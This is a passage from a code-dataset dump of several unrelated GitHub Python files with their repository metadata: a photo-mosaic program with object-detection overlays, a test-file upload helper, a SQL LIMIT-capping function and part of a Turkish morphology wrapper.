return EOQ_VALUE, EOQ_VALUE, EOQ_VALUE, EOQ_VALUE, EOQ_VALUE\n\n self.total_positive = 0\n self.total_negatives = 0\n self.start_time = time()\n\n self.total_negatives += 1\n return False, curr_diff1, curr_diff2, curr_diff3, abc\n\n def should_switch(self, id1, id2, lock, new_diff1, new_diff2, curr_diff1, curr_diff2): # diff_cache\n\n if (new_diff1 < self.alpha * curr_diff1 and new_diff2 < curr_diff2) or (\n new_diff1 < curr_diff1 and new_diff2 < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True\n return False\n\n def get_best_fit_tile(self, img_data, remaining_tiles, lock):\n best_fit_tile_index = -1\n min_diff = sys.maxsize\n candidates = []\n\n # go through each tile in turn looking for the best match for the part of the image represented by 'img_data'\n for key in remaining_tiles.keys():\n tile_data = self.tiles_data[key]\n diff = self.__get_tile_diff(img_data, tile_data, min_diff)\n if diff < min_diff:\n min_diff = diff\n candidates.append(key)\n\n lock.acquire()\n for best_fit_tile_index in reversed(candidates):\n times_used = remaining_tiles.get(best_fit_tile_index)\n if times_used is not None:\n remaining_tiles.pop(best_fit_tile_index)\n break\n lock.release()\n\n return best_fit_tile_index\n\n# switch between 3 tiles to get a better arrangement, switching 2 tiles can lead to local maxima\ndef switch_tiles(x_tile_count, y_tile_count, result_queue, coords2id, terminating_event,\n diff_cache, lock, cfg, mosaic_ready_event):\n _, original_img_small = TargetImage(cfg.image_file).get_data()\n _, tiles = TileProcessor(cfg.tiles_file).get_tiles()\n\n tiles_data = [list(tile.getdata()) for tile in tiles]\n\n # this function gets run by the worker processes, one on each CPU core\n image_cache = {}\n\n for x in range(x_tile_count):\n for y in range(y_tile_count):\n large_box, small_box = get_boxes(x, y)\n image_cache[x + y * x_tile_count] = list(original_img_small.crop(small_box).getdata())\n\n if not mosaic_ready_event.is_set():\n a_logger.debug(\"Waiting for Mosaic process\")\n mosaic_ready_event.wait()\n\n tile_fitter = TileFitter(tiles_data, diff_cache)\n\n num_tiles = len(tiles)\n num_tiles_in_image = x_tile_count * y_tile_count\n\n while not terminating_event.is_set():\n try:\n\n xy1 = int(num_tiles * random.random())\n x1 = int(xy1 / y_tile_count)\n y1 = xy1 % y_tile_count\n\n xy2 = int(num_tiles_in_image * random.random())\n x2 = int(xy2 / y_tile_count)\n y2 = xy2 % y_tile_count\n\n xy3 = int(num_tiles_in_image * random.random())\n x3 = int(xy3 / y_tile_count)\n y3 = xy3 % y_tile_count\n\n img_coords = (xy1, x2 + y2 * x_tile_count, x3 + y3 * x_tile_count)\n\n if xy1 > x_tile_count * y_tile_count - 1:\n imgdata1 = None\n else:\n imgdata1 = image_cache.get(img_coords[0])\n\n img_data = (imgdata1, image_cache.get(img_coords[1]), image_cache.get(img_coords[2]))\n\n is_switch_good, diff1, diff2, diff3, abc = tile_fitter.is_switch_good(img_data, img_coords, coords2id, lock)\n\n if is_switch_good == EOQ_VALUE:\n a_logger.debug(\"Ending switch_tiles\")\n break\n\n if is_switch_good:\n\n lock.acquire()\n id1 = coords2id[img_coords[0]]\n id2 = coords2id[img_coords[1]]\n id3 = coords2id[img_coords[2]]\n\n #abc defines the switch permutation\n if abc == BAC:\n coords2id[img_coords[0]] = id2\n coords2id[img_coords[1]] = id1\n\n elif abc == BCA:\n coords2id[img_coords[0]] = id2\n coords2id[img_coords[1]] = id3\n coords2id[img_coords[2]] = id1\n\n elif abc == CBA:\n coords2id[img_coords[0]] = id3\n coords2id[img_coords[2]] = id1\n\n elif abc == CAB:\n 
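# CAB is a 3-cycle: tile C moves into slot A, tile A into slot B and tile B into slot C (each permutation code names which tiles end up in slots A, B and C)\r\n                    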
coords2id[img_coords[0]] = id3\n coords2id[img_coords[1]] = id1\n coords2id[img_coords[2]] = id2\n\n elif abc == ACB:\n coords2id[img_coords[1]] = id3\n coords2id[img_coords[2]] = id2\n\n lock.release()\n\n result_queue.put((img_coords, (id1, id2, id3), abc), block=False, timeout=0.1)\n\n except queue.Full:\n a_logger.warning(\"Switch tiles: Queue is full !\")\n continue\n except KeyboardInterrupt:\n pass\n break\n\n # let the result handler know that this worker has finished everything\n result_queue.put((EOQ_VALUE, EOQ_VALUE, EOQ_VALUE))\n\n\ndef fit_tiles(sorted_coords, y_tile_count, result_queue, remaining_tiles, diff_cache, lock, cfg, mosaic_ready_event):\n _, original_img_small = TargetImage(cfg.image_file).get_data()\n _, tiles = TileProcessor(cfg.tiles_file).get_tiles()\n\n tiles_data = [list(tile.getdata()) for tile in tiles]\n\n # this function gets run by the worker processes, one on each CPU core\n tile_fitter = TileFitter(tiles_data, diff_cache)\n\n if not mosaic_ready_event.is_set():\n a_logger.debug(\"Waiting for Mosaic process\")\n mosaic_ready_event.wait()\n\n progress = ProgressCounter(len(sorted_coords), \"Fitting tiles to mosaic\")\n\n for coord in sorted_coords:\n try:\n y = coord % y_tile_count\n x = int(coord / y_tile_count)\n\n large_box, small_box = get_boxes(x, y)\n img_data = list(original_img_small.crop(small_box).getdata())\n img_coords = large_box\n\n tile_index = tile_fitter.get_best_fit_tile(img_data, remaining_tiles, lock)\n result_queue.put((img_coords, tile_index))\n progress.update()\n except queue.Full:\n a_logger.warning(\"Queue full while putting - shouldn't happen!\")\n continue\n except KeyboardInterrupt:\n pass\n break\n # let the result handler know that this worker has finished everything\n result_queue.put((EOQ_VALUE, EOQ_VALUE))\n\n\nclass MosaicImage:\n def __init__(self, size, tiles_file, init_mode, init_image, use_coco, coords2id, request_q):\n\n tiles, _ = TileProcessor(tiles_file).get_tiles()\n pygame.init()\n self.coords2id = coords2id\n self.window_name = \"Rosy AI\"\n self.frame_counter = 0\n self.pseudo_frame_counter = 0\n self.last_frame_time = 0\n self.requestQ = request_q\n self.fpsClock = pygame.time.Clock()\n self.font = pygame.font.SysFont('robotoregular', FONT_SIZE)\n self.colors = list(ImageColor.colormap.values())\n self.colors.remove('#000000')\n self.screen = pygame.display.set_mode(size, pygame.FULLSCREEN)\n pygame.display.set_caption(self.window_name)\n self.blits = []\n\n self.x_tile_count = int(size[0] / TILE_SIZE)\n self.y_tile_count = int(size[1] / TILE_SIZE)\n self.total_tiles_in_image = self.x_tile_count * self.y_tile_count\n surface_tiles = [pygame.surfarray.make_surface(np.array(tile).reshape((TILE_SIZE, TILE_SIZE, 3))).convert() for\n tile in\n tiles]\n self.category_index = label_map_util.create_category_index_from_labelmap(COCO2017_LABELS,\n use_display_name=True) # TODO COCO\n self.coco_model = use_coco # TODO COCO\n a_logger.debug(\"Screen size: {}, {}\".format(pygame.display.Info().current_w, pygame.display.Info().current_h))\n\n self.ratio = 1 # self.screen.get_width() / size[0] #TODO\n\n self.new_ts = min(int(self.ratio * TILE_SIZE), TILE_SIZE)\n if self.ratio != 1:\n self.tiles = [pygame.transform.smoothscale(t, (self.new_ts, self.new_ts)) for t in surface_tiles]\n else:\n self.tiles = surface_tiles\n self.img = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n self.rects = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n 
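# overlay surface for the detection boxes: black is declared transparent below, so only the drawn rectangles and labels composite over the mosaic\r\n        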
self.rects.set_colorkey((0, 0, 0))\n self.output = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n\n self.ratio = self.new_ts / TILE_SIZE\n\n if init_mode == InitMode.Random:\n self.init_randomly(self.tiles)\n elif init_mode == InitMode.Hue:\n self.init_by_hue(tiles)\n elif init_mode == InitMode.Image and init_image is not None:\n init_img = pygame.image.load(init_image).convert()\n if int(self.img.get_width() / self.img.get_height()) != int(init_img.get_width() / init_img.get_height()):\n raise AttributeError(\"Init image size doesn't match that of mosaic image\")\n try:\n x = pickle.load(open(init_image + \".coords2id.pkl\", \"rb\"))\n for i in range(len(x)):\n self.coords2id[i] = x[i]\n self.coords2id = pickle.load(open(init_image + \".coords2id.pkl\", \"rb\"))\n except Exception as e:\n a_logger.exception(\"Error reading coords2id pkl file: {}\".format(e))\n init_img = pygame.transform.scale(init_img, (self.img.get_width(), self.img.get_height()))\n self.img.blit(init_img, (0, 0))\n self.screen.blit(self.img, (0, 0))\n\n pygame.display.update()\n\n def init_randomly(self, tiles):\n\n progress = ProgressCounter(self.total_tiles_in_image, \"initializing mosaic image randomly\")\n # will be used to get random tiles without replacement, unless tiles in image >> number of tile file\n\n rand_ids = list(range(len(tiles)))\n random.shuffle(rand_ids)\n\n blit_list = []\n\n for i in range(len(tiles)):\n if i < self.total_tiles_in_image:\n y = i % self.y_tile_count\n x = int(i / self.y_tile_count)\n\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n random_index = rand_ids[i]\n tile = tiles[random_index]\n blit_list.append((tile, coords))\n self.coords2id[y * self.x_tile_count + x] = random_index\n else:\n random_index = rand_ids[i]\n self.coords2id[i] = random_index\n\n progress.update()\n\n self.img.blits(blit_list)\n\n def init_by_hue(self, tiles):\n\n progress = ProgressCounter(self.total_tiles_in_image, \"initializing mosaic image by hue\")\n\n # get a representative sample of dataset, so we don't take the first n elements from a sorted list\n sample = tiles\n if len(tiles) > self.x_tile_count * self.y_tile_count:\n sample = random.sample(tiles, self.x_tile_count * self.y_tile_count)\n\n hue = self.sort_by_hue(sample)\n\n blit_list = []\n for x in range(self.x_tile_count):\n for y in range(self.y_tile_count):\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n tile_idx = hue[(x * self.y_tile_count + y) % len(hue)][1]\n\n tile = pygame.surfarray.make_surface(np.array(sample[tile_idx]).reshape((TILE_SIZE, TILE_SIZE, 3)))\n tile = pygame.transform.scale(tile, (self.new_ts, self.new_ts))\n\n blit_list.append((tile, coords))\n self.coords2id[y * self.x_tile_count + x] = tile_idx\n progress.update()\n\n self.img.blits(blit_list)\n\n # input: a list of tile images\n # output: a sorted list of these image tiles, sorted bu hue values\n @staticmethod\n def sort_by_hue(tiles):\n hue = []\n\n for i, im in enumerate(tiles):\n h = get_hue(im)\n hue.append((h, i))\n\n hue.sort(key=itemgetter(0))\n _, coords = zip(*hue)\n return hue\n\n def add_tile(self, coords, index, video_camera, switch, results, abc):\n self.pseudo_frame_counter += 1\n if switch:\n c1 = coords[0]\n id1 = index[0]\n c2 = coords[1]\n id2 = index[1]\n c3 = coords[2]\n id3 = index[2]\n\n if abc == BAC:\n self.switch_and_add(c2, id1)\n self.switch_and_add(c1, id2)\n elif abc == BCA:\n self.switch_and_add(c1, id2)\n 
self.switch_and_add(c2, id3)\n self.switch_and_add(c3, id1)\n\n elif abc == CBA:\n self.switch_and_add(c3, id1)\n self.switch_and_add(c1, id3)\n\n elif abc == CAB:\n self.switch_and_add(c1, id3)\n self.switch_and_add(c2, id1)\n self.switch_and_add(c3, id2)\n\n elif abc == ACB:\n self.switch_and_add(c3, id2)\n self.switch_and_add(c2, id3)\n else:\n tile_data = self.tiles[index]\n x_c = int(coords[0] * self.ratio)\n y_c = int(coords[1] * self.ratio)\n self.blits.append((tile_data, (x_c, y_c)))\n #self.img.blit(tile_data, (x_c, y_c))\n\n if self.pseudo_frame_counter % 8 == 0 or results is not None or (\n int(time() * 1000) - self.last_frame_time >= 100):\n self.frame_counter += 1\n self.last_frame_time = int(time() * 1000)\n self.img.blits(self.blits)\n self.blits.clear()\n self.show_frame(results, video_camera)\n\n def switch_and_add(self, c_i, id_j):\n if c_i < self.total_tiles_in_image:\n tile_data1 = self.tiles[id_j]\n\n x = c_i % self.x_tile_count\n y = int(c_i / self.x_tile_count)\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n self.blits.append((tile_data1, coords))\n # self.img.blit(tile_data1, coords)\n\n def show_frame(self, result, vidcam=None):\n\n frame_annotate_rate = 400\n\n if self.frame_counter % frame_annotate_rate == 1:\n # convert to array for tf model. array3d swaps axes, so need to swap back\n resized = pygame.surfarray.array3d(self.img)\n resized = resized.swapaxes(0, 1)\n\n try:\n self.requestQ.put((resized, self.coco_model), block=False)\n except queue.Full:\n a_logger.warning(\"Ml queue full\")\n # self.frame_counter-=40\n pass\n if result is not None:\n if self.coco_model:\n self.draw_boxes(\n result[\"detection_boxes\"][0],\n result[\"detection_classes\"][0], result[\"detection_scores\"][0])\n else: # TODO coco\n self.draw_boxes(\n result[\"detection_boxes\"],\n result[\"detection_class_entities\"], result[\"detection_scores\"])\n\n self.output.blit(self.img, (0, 0))\n self.output.blit(self.rects, (0, 0))\n self.screen.blit(self.output, (0, 0))\n pygame.display.flip()\n self.fpsClock.tick(15)\n\n if vidcam is not None:\n frame = pygame.surfarray.array3d(self.output)\n frame = frame.swapaxes(0, 1)\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n vidcam.write(frame)\n\n @staticmethod\n def save(surface, path):\n pygame.image.save(surface, path)\n\n def draw_boxes(self, boxes, class_names, scores, max_boxes=MAX_BOXES, min_score=0.01):\n # Overlay labeled boxes on an image with formatted scores and label names.\n self.rects.fill((0, 0, 0))\n\n im_width, im_height = self.rects.get_size()\n\n max_results = min(boxes.shape[0], max_boxes)\n for i in range(max_results - 1, -1, -1):\n if scores[i] >= min_score:\n ymin, xmin, ymax, xmax = tuple(boxes[i])\n if self.coco_model:\n class_name = self.category_index[class_names[i]]['name']\n display_str = \"{} ({}%)\".format(class_name, int(100 * scores[i]))\n else: # TODO coco\n display_str = \"{} ({}%)\".format(class_names[i].decode(\"ascii\"), int(100 * scores[i]))\n\n color = self.colors[hash(class_names[i]) % len(self.colors)]\n font_color = self.get_contrast_color(color)\n\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n\n text = self.font.render(display_str, True, font_color)\n text_rect = text.get_rect()\n text_width, text_height = text_rect.width, text_rect.height\n\n if top - text_height > 0:\n text_bottom = top\n else:\n text_bottom = top + text_height\n\n if left + text_width > im_width:\n text_left = right - 
text_width\n else:\n text_left = left\n\n text_rect.bottomleft = (text_left, text_bottom)\n\n pygame.draw.lines(self.rects, color, True, [(left, top), (left, bottom), (right, bottom), (right, top)],\n width=LINE_WIDTH)\n pygame.draw.rect(self.rects, color, text_rect)\n self.rects.blit(text, text_rect)\n\n @staticmethod\n def get_contrast_color(color):\n try:\n i_color = ImageColor.getrgb(color)\n luma = ((0.2126 * i_color[0]) + (0.7152 * i_color[1]) + (0.0722 * i_color[2])) / 255\n wl = 0.05 / (luma + 0.05)\n bl = (luma + 0.05) / 1.05\n if bl > wl:\n font_color = (16, 16, 16) # black\n else:\n font_color = (240, 240, 240)\n except AttributeError:\n a_logger.error(\"Problem with color: {}\".format(color))\n font_color = (16, 16, 16) # black\n pass\n return font_color\n\n\ndef model_runner(request_q, answers_q, terminating_event, ready_event, path):\n a_logger.debug(\"Loading model\")\n\n img = tf.io.read_file(path)\n img = tf.image.decode_jpeg(img, channels=3)\n\n module_handle = MODEL_DIR_COCO2017\n coco_detector = hub.load(module_handle)\n converted_img = tf.expand_dims(tf.image.convert_image_dtype(img, tf.uint8), axis=0)\n # to \"warm up\" the model, so consecutive calls are fast\n coco_detector(converted_img)\n\n module_handle = MODEL_DIR_OPENIMAGES\n openimage_detector = hub.load(module_handle).signatures['default']\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n openimage_detector(converted_img)\n\n a_logger.debug(\"Model loaded\")\n ready_event.set()\n\n while not terminating_event.is_set():\n try:\n img, use_coco = request_q.get(block=True, timeout=0.05)\n\n if use_coco:\n converted_img = tf.expand_dims(tf.image.convert_image_dtype(img, tf.uint8), axis=0) # TODO COCO\n detector = coco_detector\n else:\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n detector = openimage_detector\n\n start_time = time()\n result = detector(converted_img)\n end_time = time()\n\n result = {key: value.numpy() for key, value in result.items()}\n\n a_logger.debug(\"Found %d objects.\" % len(result[\"detection_scores\"]))\n a_logger.debug(\"Inference time: {} \".format(end_time - start_time))\n\n answers_q.put(result)\n\n except queue.Empty:\n continue\n except KeyboardInterrupt:\n pass\n break\n\n\ndef build_mosaic(result_queue, size, coords2id, cfg, terminating_event, request_q, answer_q,\n mosaic_ready_event, ml_ready_event):\n create_video = cfg.create_video\n switch = cfg.building_order == BuildMode.Switch\n\n active_workers = WORKER_COUNT\n video_camera = None\n\n a_logger.debug(\"Creating mosaic image\")\n mosaic = MosaicImage(size, cfg.tiles_file, cfg.init_order, cfg.init_image, cfg.use_coco, coords2id, request_q)\n\n if not ml_ready_event.is_set():\n a_logger.debug(\"Waiting for ML model\")\n show_text(mosaic.screen, \"Loading Machine Learning model...\")\n for _ in pygame.event.get():\n pass\n ml_ready_event.wait()\n\n # signal that working processes can start\n a_logger.debug(\"Mosaic is ready!\")\n mosaic_ready_event.set()\n\n if create_video:\n size = (mosaic.output.get_size()) # TODO\n video_camera = cv2.VideoWriter(OUTPUT_VIDEO_FILE_NAME, cv2.VideoWriter_fourcc(*'DIVX'), FPS, size)\n counter = 0\n\n # Sanity check to empty queue from last run\n try:\n answer_q.get(block=False)\n except queue.Empty:\n pass\n\n abc = -1\n while True:\n try:\n for e in pygame.event.get():\n if e.type == pygame.QUIT or e.type == KEYDOWN and e.key == K_ESCAPE:\n raise KeyboardInterrupt\n\n if switch:\n img_coords, index, abc = 
result_queue.get(block=True, timeout=0.01)\n else:\n img_coords, index = result_queue.get(block=True, timeout=0.01)\n if counter % 75 == 0: # TODO\n try:\n results = answer_q.get(block=False)\n except queue.Empty:\n results = None\n pass\n else:\n results = None\n\n if img_coords == EOQ_VALUE:\n active_workers -= 1\n a_logger.debug(\"{} remaining working process out of {}\".format(active_workers, WORKER_COUNT))\n if not active_workers:\n # analyze the last frame\n mosaic.show_frame(results, video_camera)\n break\n else:\n mosaic.add_tile(img_coords, index, video_camera, switch, results, abc)\n counter += 1\n except queue.Empty:\n continue\n except KeyboardInterrupt:\n pass\n break\n\n terminating_event.set()\n\n if video_camera is not None:\n video_camera.release()\n mosaic.save(mosaic.img, OUTPUT_FRAME_IMAGE_FILE_NAME)\n mosaic.save(mosaic.output, OUTPUT_SCREEN_IMAGE_FILE_NAME)\n a_logger.debug('Finished, output is in {}, {}'.format(OUTPUT_FRAME_IMAGE_FILE_NAME, OUTPUT_SCREEN_IMAGE_FILE_NAME))\n\n to_save = [coords2id[i] for i in range(len(coords2id))]\n pickle.dump(to_save, open(OUTPUT_FRAME_IMAGE_FILE_NAME + \".coords2id.pkl\", \"wb\"))\n\n if cfg.wait_for_keypress:\n while True:\n event = pygame.event.wait()\n if event.type == QUIT or event.type == KEYDOWN:\n break\n\n pygame.quit()\n\n\n# Display message center screen\ndef show_text(screen, text):\n font = pygame.font.SysFont('robotoregular', 20)\n text = font.render(text, True, (16, 16, 16))\n text_rect = text.get_rect(topleft=(25, 25))\n pygame.draw.rect(screen, (50, 255, 50), text_rect)\n screen.blit(text, text_rect)\n pygame.display.update()\n\n\ndef compose(conf, request_q, answer_q, ml_ready_event):\n a_logger.debug('Building mosaic, press Ctrl-C to abort...')\n\n original_img_large, original_img_small = TargetImage(conf.image_file).get_data()\n all_tile_data_large, all_tile_data_small = TileProcessor(conf.tiles_file).get_tiles()\n\n x_tile_count = int(original_img_large.size[0] / TILE_SIZE)\n y_tile_count = int(original_img_large.size[1] / TILE_SIZE)\n total_tiles = x_tile_count * y_tile_count\n\n global MAX_REUSE\n MAX_REUSE = max(1, int(total_tiles / len(all_tile_data_large)))\n a_logger.debug(\"MAX_REUSE: {}, mosaic.total_tiles: {}, all_tile_data_large: {}\".format(MAX_REUSE, total_tiles,\n len(all_tile_data_large)))\n\n if MAX_REUSE > 1:\n logging.warning(\n \"mosaic total tiles ({}) is bigger than total number of tiles ({}). 
Some tiles will be reused more than \"\n \"once\".format(\n total_tiles,\n len(all_tile_data_large)))\n\n result_queue = Queue()\n coords2id = Array('i', len(all_tile_data_large)) # todo was total_tiles\n diff_cache = Array('i', len(all_tile_data_large))\n terminating_event = multiprocessing.Event()\n mosaic_ready_event = multiprocessing.Event()\n lock = Lock()\n manager = multiprocessing.Manager()\n remaining_tiles = manager.dict({idx: 0 for idx in range(len(all_tile_data_large))})\n\n try:\n\n a_logger.debug(\"Starting build mosaic process\")\n\n # start the worker processes that will build the mosaic image\n p = Process(target=build_mosaic,\n args=(\n result_queue, original_img_large.size, coords2id, conf, terminating_event,\n request_q, answer_q, mosaic_ready_event, ml_ready_event))\n p.start()\n processes = []\n\n a_logger.debug(\"Adding tiles to image\")\n if conf.building_order == BuildMode.Switch:\n for n in range(WORKER_COUNT):\n a_logger.debug(\"Starting worker queue {}\".format(n))\n w = Process(target=switch_tiles,\n args=(x_tile_count, y_tile_count, result_queue,\n coords2id, terminating_event, diff_cache, lock, conf, mosaic_ready_event))\n w.start()\n processes.append(w)\n else:\n if conf.building_order == BuildMode.Random:\n sorted_list = list(range(x_tile_count * y_tile_count))\n random.shuffle(sorted_list)\n elif conf.building_order == BuildMode.Ordered:\n flavor = random.randint(1, 4)\n if flavor == 1:\n sorted_list = [y + x * y_tile_count for y in range(y_tile_count) for x in range(x_tile_count)]\n elif flavor == 2:\n sorted_list = [y + x * y_tile_count for y in range(y_tile_count) for x in range(x_tile_count)]\n sorted_list.reverse()\n elif flavor == 3:\n sorted_list = list(range(x_tile_count * y_tile_count))\n elif flavor == 4:\n sorted_list = list(range(x_tile_count * y_tile_count - 1, -1, -1))\n else:\n sorted_list = get_brightness_data(original_img_small, x_tile_count, y_tile_count)\n grey = math.sqrt(0.241 * (128 ** 2) + 0.691 * (128 ** 2) + 0.068 * (128 ** 2))\n random.shuffle(sorted_list)\n\n chunk_size = int(len(sorted_list) / (WORKER_COUNT)) + 1\n\n # create n working processes, each responsible for a chunk of the tiles\n for n in range(0, len(sorted_list), chunk_size):\n a_logger.debug(\n \"Starting worker queue for range {} - {}\".format(n, min(n + chunk_size, len(sorted_list))))\n sub_list = sorted_list[n: min(n + chunk_size, len(sorted_list))]\n\n if conf.building_order == BuildMode.BrightnessReverse or conf.building_order == BuildMode.Brightness:\n sub_list.sort(key=lambda l: (l[0] - grey) ** 2,\n reverse=(conf.building_order == BuildMode.BrightnessReverse))\n _, sub_list = zip(*sub_list)\n\n w = Process(target=fit_tiles,\n args=(\n sub_list, y_tile_count, result_queue, remaining_tiles, diff_cache, lock, conf,\n mosaic_ready_event))\n w.start()\n processes.append(w)\n except Exception as e:\n a_logger.exception(e)\n terminating_event.set()\n\n a_logger.debug(\"Done setting up working processes, waiting for them to complete\")\n for w in processes:\n w.join()\n p.join()\n a_logger.debug(\"All processes done!\")\n\n\ndef random_run(request_q, answer_q, ready_event):\n try:\n build_modes = len(BuildMode)\n bm = random.randint(1, build_modes)\n\n init_mode = len(InitMode) - 1 # minus 1 since we ended up disliking the Hue sorting TODO\n im = random.randint(1, init_mode)\n\n src_images = glob.glob(INPUT_IMAGES_DIR + \"*.jpg\")\n img = random.choice(src_images)\n\n tiles_files = glob.glob(INPUT_TILES_DIR + \"*.pkl\")\n tiles_file = 
random.choice(tiles_files)\n\n init_images = glob.glob(INPUT_INIT_IMAGES_DIR + \"*.jpg\")\n init_img = random.choice(init_images)\n\n #use_coco = bool(random.getrandbits(1))\n use_coco = False #todo - I am not very fond of COCO results\n\n a_logger.debug(\"BuildMode: {}, InitMode: {}, src image: {}\".format(BuildMode(bm).name, InitMode(im).name, img))\n\n cfg = Config(create_video=True, save_images=False, init_order=InitMode(im), building_order=BuildMode(bm),\n image_file=img, init_image=init_img, tiles_file=tiles_file, wait_for_keypress=False,\n use_coco=use_coco)\n\n compose(cfg, request_q, answer_q, ready_event)\n except Exception as msg:\n a_logger.exception(msg)\n pass\n\n\ndef main():\n request_q = Queue(5)\n answer_q = Queue()\n terminating_event = multiprocessing.Event()\n ready_event = multiprocessing.Event()\n\n src_images = glob.glob(INPUT_IMAGES_DIR + \"*.jpg\")\n path = random.choice(src_images)\n\n p = Process(target=model_runner, args=(request_q, answer_q, terminating_event, ready_event, path))\n p.start()\n\n while True:\n a_logger.debug(\"Rolling the dice!\")\n random_run(request_q, answer_q, ready_event)\n\n terminating_event.set()\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yarivadan/live_mosaic","sub_path":"mosaic_art.py","file_name":"mosaic_art.py","file_ext":"py","file_size_in_byte":45671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"35513061935","text":"from webEval.web_eval__core.models import *\nfrom webEval.web_eval__core.utils__helper import *\n\ndef upload_input_file (file, problem, test):\n input_filename = '%s-%s.in' % (test.no, problem.code)\n input_path = os.path.join(settings.TESTS_DIR, problem.code, input_filename)\n save_file(input_path, file)\n test.input_size = file.size\n test.save()\n os.system(\"svn add %s\" % input_path)\n \n \ndef upload_output_file (file, problem, test):\n output_filename = \"%s-%s.ok\" % (test.no, problem.code)\n output_path = os.path.join(settings.TESTS_DIR, problem.code, output_filename)\n save_file(output_path, file)\n test.output_size = file.size\n test.save()\n os.system(\"svn add %s\" % output_path)\n","repo_name":"hadesgames/webEval","sub_path":"web_eval__core/grader__helper.py","file_name":"grader__helper.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"}
+{"seq_id":"34328189501","text":"import re\n\n\ndef upper_boundary_maximum_records(sql_cmd: str, max_present: int) -> str:\n \"\"\"\n replace the LIMIT in a query\n Args:\n sql_cmd (str): original sql command\n max_present (int): maximum number of returned entries\n\n Returns:\n str: bounded sql command\n \"\"\"\n re_pattern = 'LIMIT [0-9]*'\n limit_number_found = re.findall(re_pattern, sql_cmd, re.IGNORECASE)\n if len(limit_number_found) > 0:\n limit_number_sub = limit_number_found[0]\n limit_number = int(limit_number_sub.split(\" \")[-1])\n if limit_number > max_present:\n sql_cmd = re.sub(re_pattern, f\"LIMIT {max_present}\", sql_cmd)\n return sql_cmd\n","repo_name":"Recherches-Neuro-Hippocampe/llmReflect","sub_path":"llmreflect/Utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"70056729852","text":"from jpype import JClass, getDefaultJVMPath, startJVM, shutdownJVM, JString, isJVMStarted, java\nfrom typing import List\nimport os\nimport 
logging\nfrom lacivert import properties\n\n\nclass Morphology:\n \n \n NOUN = \"Noun\"\n VERB = \"Verb\"\n\n\n def __init__(self):\n \n Morphology: JClass = JClass('zemberek.morphology.TurkishMorphology')\n self.morphology: Morphology = Morphology.createWithDefaults()\n\n self.RootLexicon: JClass = JClass('zemberek.morphology.lexicon.RootLexicon')\n \n self.InformalAnalysisConverter: JClass = JClass('zemberek.morphology.analysis.InformalAnalysisConverter')\n \n self.AnalysisFormatters: JClass = JClass('zemberek.morphology.analysis.AnalysisFormatters')\n \n self.DictionaryItem: JClass = JClass('zemberek.morphology.lexicon.DictionaryItem')\n \n self.WordAnalysis: JClass = JClass('zemberek.morphology.analysis.WordAnalysis')\n \n \n logging.info(\"Morphology class initialized\")\n\n def disambiguate(self, sentence):\n logging.info(\"lemmatization started\")\n analysis: java.util.ArrayList = self.morphology.analyzeSentence(sentence)\n results: java.util.ArrayList = self.morphology.disambiguate(sentence, analysis).bestAnalysis()\n print(\"CHECK BELOW\")\n res: List[str] = []\n\n for i, analysis in enumerate(results, start=1):\n # print(\n # f'\\nAnalysis {i}: {analysis}',\n # f'\\nAnalysis {i}: {type(analysis)}',\n # f'\\nPrimary POS {i}: {analysis.getPos()}'\n # f'\\nPrimary POS (Short Form) {i}: {analysis.getPos().shortForm}',\n # f'\\nMorphemes {i}: {analysis.getMorphemes()}'\n # f'\\nsurFaceForm {i}: {analysis.surfaceForm()}'\n # f'\\ngetLemmas {i}: {analysis.getLemmas()}'\n # f'\\ngetStemAndEnding {i}: {analysis.getStemAndEnding()}'\n # f'\\ngetDictionaryItem {i}: {analysis.getDictionaryItem()}'\n # f'\\ngetDictionaryItem {i}: {type(analysis.getDictionaryItem())}'\n # f'\\nisUnknown {i}: {analysis.isUnknown()}'\n # )\n res.append({\n \"root\": analysis.getLemmas()[0],\n \"pos\": analysis.getPos().shortForm,\n \"dictForm\": analysis.getDictionaryItem(),\n \"dictFormStr\": str(analysis.getDictionaryItem()),\n \"unk\": analysis.isUnknown(),\n \"morphemes\": analysis.getMorphemes(),\n \"morphemesStr\": str(analysis.getMorphemes())\n # f'{str(analysis.getLemmas()[0])}-{analysis.getPos().shortForm}'\n })\n\n\n return res\n\n\n def disambiguate_doc(self, doc): pass\n\n\n def change_stem(self, source_word: str, target_word: str) -> str:\n logging.debug(f\"Stem changing for '{target_word}' using '{source_word}' as source.\")\n new_stem: self.DictionaryItem = (\n self.morphology.getLexicon().getMatchingItems(target_word).get(0)\n )\n\n logging.debug(f\"Lexicon for {target_word} is: {self.morphology.getLexicon().getMatchingItems(target_word).get(0)}\")\n logging.debug(f\"Dict Item of above lexicon {new_stem}\")\n \n\n results: self.WordAnalysis = self.morphology.analyze(JString(source_word))\n\n # print(\"--------------------------------\")\n # print(f\"Word Analysis result of {source_word}\")\n # print(results)\n # print(type(results))\n # print(\"--------------------------------\")\n\n for result in results:\n # print(result.getMorphemes())\n generated: java.util.ArrayList = (\n self.morphology.getWordGenerator().generate(\n new_stem, result.getMorphemes()\n )\n )\n # for gen_word in generated:\n # print(\n # f'\\nInput Analysis: {str(result.formatLong())}'\n # f'\\nAfter Stem Change, Word: {str(gen_word.surface)}'\n # '\\nAfter Stem Change, Analysis:'\n # f'{str(gen_word.analysis.formatLong())}'\n # )\n 